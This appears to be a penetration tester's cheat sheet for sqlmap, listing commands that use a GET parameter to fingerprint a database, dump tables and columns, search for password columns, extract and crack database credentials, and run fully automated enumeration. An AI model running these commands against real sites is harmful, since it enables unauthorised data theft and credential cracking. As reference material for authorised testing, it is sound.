GET REQUESTS

BASIC ENUMERATION

INITIAL

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
 * the --banner retrieves the Database version banner
 * the --current-user retrieves the Current user name
 * the --current-db retrieves the Current database name
 * the --is-dba checks whether the current user has DBA (administrator) rights

TABLE & DATA DUMPS (SINGLE TABLE)

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb
 +---------------+
 | member        |
 | data          |
 | international |
 | users         |
 +---------------+
 * this is used after finding the current database name
 
#this dumps the full table contents
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb
 +----+--------+------------+
 | id | name   | surname    |
 +----+--------+------------+
 | 1  | luther | blisset    |
 | 2  | fluffy | bunny      |
 | 3  | wu     | ming       |
 | 4  | NULL   | nameisnull |
 +----+--------+------------+
 * used after the identification of tables
 * the --dump is sed to retrieve the contents of specified table
 * the defalt dump format is .csv and the dump will be stored in
   /home/user/.local/share/sqlmap/output/ for further investigation
    - other formats include HTML or SQLite via --dump-format
    
#this dumps only the specified table columns
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
 * the -C is used to specify specific columns

#this dumps only the specified table rows from the columns
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3
 * the --start & --stop options are used specifically for table rows
 * this cmd displays rows starting from 2nd up to 3rd entry 

#conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"
 * this uses the WHERE clause to filter for specifics

FULL DB DUMP (ALL TABLES)

--dump-all -D {testDB} --exclude-sysdbs
 * all of the current database content will be retrieved
 * the --exclude-sysdbs option will skip the retrieval of content from 
   system databases, as it is usually of little interest for pentesters.

ADVANCED ENUMERATION

SEMI AUTOMATED

# retrieve the structure of all of the tables to have a complete overview of the database architecture
sqlmap -u "http://www.example.com/?id=1" --schema

#
sqlmap -u "http://www.example.com/?id=1" --search -T user
 * the --user option is used to search for databases, tables, and columns of interest,
    - it enables the attacker to search for identifier names by using the LIKE operator
 * the --dump is incompatible with --search; hence it can't be used

sqlmap -u "http://www.example.com/?id=1" --search -C pass
 * the -C option can be used to filter the search based on specific column names
 
#retrieve credentials from tables in DB
sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users
 * the -T cmd is used to specify a specific table
 * this cmd will automatically enumerate and crack passwords
    - sqlmap has automatic password hashes cracking capabilities via a dictionary-based attack 
    
#DB Users Password Enumeration and Cracking
sqlmap -u "http://www.example.com/?id=1" --passwords --batch
 * the --passwords option dumps the content of system tables containing database-specific credentials (e.g., connection credentials)

FULLY AUTOMATED ENUMERATION

in a fully automated enumeration, everything accessible will be retrieved and will run for a long time. once complete, you will need to find the data of interest in the output files manually.

#AUTOMATED
sqlmap -u {targetSite:port}/?id=1 --batch --all
 * will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details.

Last updated